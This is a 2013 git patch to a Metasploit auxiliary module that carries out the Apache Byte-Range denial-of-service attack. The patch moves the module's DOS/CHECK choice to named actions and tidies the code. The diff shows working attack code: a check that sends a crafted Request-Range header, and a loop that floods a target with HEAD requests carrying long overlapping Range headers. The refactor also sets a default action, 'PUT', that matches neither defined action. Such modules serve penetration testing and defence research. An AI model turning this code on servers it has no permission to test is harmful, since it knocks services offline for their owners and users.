From 7e28a4ddb0bf683b7fb7113cd7a06989dbe69e26 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 22 Apr 2013 15:41:47 -0500 Subject: [PATCH] Uses "ACTIONS" keys instead of datastore options It's better to use ACTIONS instead of datastore in this case. Also, did some cleanup. --- .../auxiliary/dos/http/apache_range_dos.rb | 69 ++++++++++--------- 1 file changed, 35 insertions(+), 34 deletions(-) diff --git a/modules/auxiliary/dos/http/apache_range_dos.rb b/modules/auxiliary/dos/http/apache_range_dos.rb index b063d439e5..3cac36672a 100644 --- a/modules/auxiliary/dos/http/apache_range_dos.rb +++ b/modules/auxiliary/dos/http/apache_range_dos.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,12 @@ class Metasploit3 < Msf::Auxiliary 'Markus Neis ' # check for vulnerability ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', + 'Actions' => + [ + ['DOS'], + ['CHECK'] + ], + 'DefaultAction' => 'PUT', 'References' => [ [ 'BID', '49303'], @@ -43,43 +44,44 @@ class Metasploit3 < Msf::Auxiliary [ 'EDB', '17696'], [ 'OSVDB', '74721' ], ], - 'DisclosureDate' => 'Aug 19 2011', + 'DisclosureDate' => 'Aug 19 2011' )) register_options( [ Opt::RPORT(80), OptString.new('URI', [ true, "The request URI", '/']), - OptInt.new('RLIMIT', [ true, "Number of requests to send",50]), - OptEnum.new('ACTION', [true, "DOS or CHECK", "DOS",["DOS","CHECK"]]) + OptInt.new('RLIMIT', [ true, "Number of requests to send",50]) ], self.class) end def run_host(ip) - case datastore['action'] + case action.name + when 'DOS' + conduct_dos() - when 'DOS' - conduct_dos() - - when 'CHECK' - check_for_dos() + when 'CHECK' + check_for_dos() end end def check_for_dos() path = datastore['URI'] - begin - res = send_request_cgi({ - 'uri' => path, - 'method' => 'HEAD', - 'headers' => { "HOST" => "Localhost", "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"} }) - - if (res and res.code == 206) - print_status("Response was #{res.code}") - print_status("Found Byte-Range Header DOS at #{path}") + begin + res = send_request_cgi({ + 'uri' => path, + 'method' => 'HEAD', + 'headers' => { + "HOST" => "Localhost", + "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10" + } + }) + if (res and res.code == 206) + print_status("Response was #{res.code}") + print_status("Found Byte-Range Header DOS at #{path}") report_note( :host => rhost, @@ -87,16 +89,13 @@ class Metasploit3 < Msf::Auxiliary :data => "Apache Byte-Range DOS at #{path}" ) - else - print_status("#{rhost} doesn't seem to be vulnerable at #{path}") - - end + else + print_status("#{rhost} doesn't seem to be vulnerable at #{path}") + end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE - end - - + end end @@ -111,10 +110,12 @@ class Metasploit3 < Msf::Auxiliary begin print_status("Sending DoS packet #{x} to #{rhost}:#{rport}") res = send_request_cgi({ - 'uri' => uri, - 'method' => 'HEAD', - 'headers' => { "HOST" => rhost, - "Range" => "bytes=0-#{ranges}"}},1) + 'uri' => uri, + 'method' => 'HEAD', + 'headers' => { + "HOST" => rhost, + "Range" => "bytes=0-#{ranges}"}},1) + rescue ::Rex::ConnectionRefused print_status("Unable to connect to #{rhost}:#{rport}.") rescue ::Errno::ECONNRESET